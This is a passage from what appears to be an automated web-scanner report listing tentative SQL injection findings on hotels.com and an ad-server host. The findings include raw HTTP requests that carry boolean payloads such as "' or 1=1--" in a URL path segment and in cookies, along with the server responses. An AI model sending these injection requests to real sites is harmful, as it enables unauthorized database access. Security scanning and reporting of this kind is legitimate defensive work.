Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=5823045321059860'%20or%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:31:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:31:03 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h4>
<div class="property_details_reviews_trip_advisor">
<div class="overall_review clearfix">
<span class="overall">Overall rating:</span>
<span class="tripadvisor_owl_small"></span>
<span class="tripadvisor_rating tripadvisor_rating_40"><span class="bar"></span><span class="sprite"></span></span>
<span class="basedon">
Based on <em>1288</em> traveller reviews</span>
</div>
<h3>Most recent traveller reviews:</h3>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_30">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class="title">"Amazing location, great lobby, small rooms"</q>
<div class="review_data">
<abbr title="10/01/11" class="date">10/01/11</abbr>
<span class="author">gopher2003</span>
<span class="location">Denver</span>
</div>
<p>
"If you are looking to spend very little time in the room, or you are travling alone and don't mind tight quarters, but location is your priority- this is the place for you. Parker House is on the Freedom Trail, located next to everything historical and mere blocks from three different subway stops. You absolutly can't beat the location. That being said, the room is one of the smallest I've been in. It was clean, tighty and comfy if you don't need a lot of room. Also, its historical so translate that as thin walls."
</p>
</div>
<div class="clear-both"></div>
<div class="individual_review">
<span class="tripadvisor_rating tripadvisor_rating_40">
<span class="bar"></span>
<span class="sprite"></span>
</span>
<q class
...[SNIP]...

1.21. http://www.hotels.com/hoteldetails/urgencypopup.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 16779709'%20or%201%3d1--%20 and 16779709'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hoteldetails/urgencypopup.html16779709'%20or%201%3d1--%20?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:26 GMT
Content-Length: 41824
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:26 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKYa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAIe7QjZSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKYa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAIe7QjZSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
</ul>
</div>
<div class="main_links" role="navigation">
<ul class="main_nav">
<li class="first">
<a class="clickreport " href="http://www.hotels.com/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdIdFQlySAI6pZ0OApYg33RWfGOdA61bA-wBSA2wmJ5tO7Mb2DK2cjNZRnUiQucEIQ..">Hotels</a>
</li>
<li class="deals">
<a class="clickreport " href="http://www.hotels.com/deals/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikfV8l41X81B1pOxSsGx7JlPHtt9ZLXVa91DJ8ST8H1Lxi84a8_hhwLk.">Hotel Deals</a>
</li>
<li class="">
<a class="clickreport " href="http://www.hotels.com/hotel/packages.html" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdgvi0gfNwOUFOmxtlW1DoVWfGOdA61bA-wBSA2wmJ5tvGPLPCtG0u5xQQ2OuQoko
...[SNIP]...

Request 2

GET /hoteldetails/urgencypopup.html16779709'%20or%201%3d2--%20?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Expect:
Content-Type: text/html;charset=UTF-8
Cache-Control: private
RTSS: 1
Content-Length: 41968
Date: Mon, 03 Oct 2011 00:29:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:26 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKUa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAJ-e43JSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]>
<!--[if IE]>
<a id="sign_in_header_button" href="https://ssl.hotels.com/profile/signin.html?target=H4sIAAAAAAAAANPPyC9JzUlJLUnMzCnWLy1KT81LrizILygt0Msoyc0xNDM3tzQ3sFRXNTLILwIShqrGKUa6ukCWPVinZ4ptsp5edn5VuJOrf7hRrq8eAJ-e43JSAAAA&secure=false" rel="nofollow"
title="Sign in for faster booking and enhanced services"> Sign in</a>
<![endif]-->
</span>
<span>&nbsp;/&nbsp;</span>
<a id="sign_up_header_button" href="https://ssl.hotels.com/profile/signup.html" rel="nofollow"
title="For faster bookings and enhanced services">Create Account</a>
</div>
<ul>
<li>
<a href="https://ssl.hotels.com/profile/summary.html" rel="nofollow"
title="View or edit your account details">
Account</a>
</li>
<li>
<a href="https://ssl.hotels.com/customer_care/bookings.html" rel="nofollow"
title="View or cancel a booking you've already made">
Reservations</a>
</li>
</ul>
</div>
<div class="main_links" role="navigation">
<ul class="main_nav">
<li class="first">
<a class="clickreport " href="http://www.hotels.com/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdIdFQlySAI6pZ0OApYg33RWfGOdA61bA-wBSA2wmJ5tO7Mb2DK2cjNZRnUiQucEIQ..">Hotels</a>
</li>
<li class="deals">
<a class="clickreport " href="http://www.hotels.com/deals/" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikfV8l41X81B1pOxSsGx7JlPHtt9ZLXVa91DJ8ST8H1Lxi84a8_hhwLk.">Hotel Deals</a>
</li>
<li class="">
<a class="clickreport " href="http://www.hotels.com/hotel/packages.html" title="" rel="clickReportc..GO0K0p-rZ07bVQrGQdWikdgvi0gfNwOUFOmxtlW1DoVWfGOdA61bA-wBSA2wmJ5tvGPLPCtG0u5xQQ2OuQoko
...[SNIP]...

1.22. http://www.hotels.com/hoteldetails/urgencypopup.html [mvthistory cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The mvthistory cookie appears to be vulnerable to SQL injection attacks. The payloads 12592570'%20or%201%3d1--%20 and 12592570'%20or%201%3d2--%20 were each submitted in the mvthistory cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US12592570'%20or%201%3d1--%20; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Cteonnt-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.0.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.0.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.0.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTMwLjEuMS5pMjoxMDMuNC4xLmk2OjE3MS4xLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjAuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjAuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>

Request 2

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US12592570'%20or%201%3d2--%20; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
ntCoent-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEzMC4xLjEuaTI6MTAzLjQuMS5pNjoxNzEuMS4wOjQ4LjEuMDo5OC42LjQ6MTQyLjAuMC5pNDoyMDAuMC4wOjE5OC4wLjA6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4wLjAuaTF8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>

1.23. http://www.revresda.com/event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.revresda.com
Path:   /event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/

Issue detail

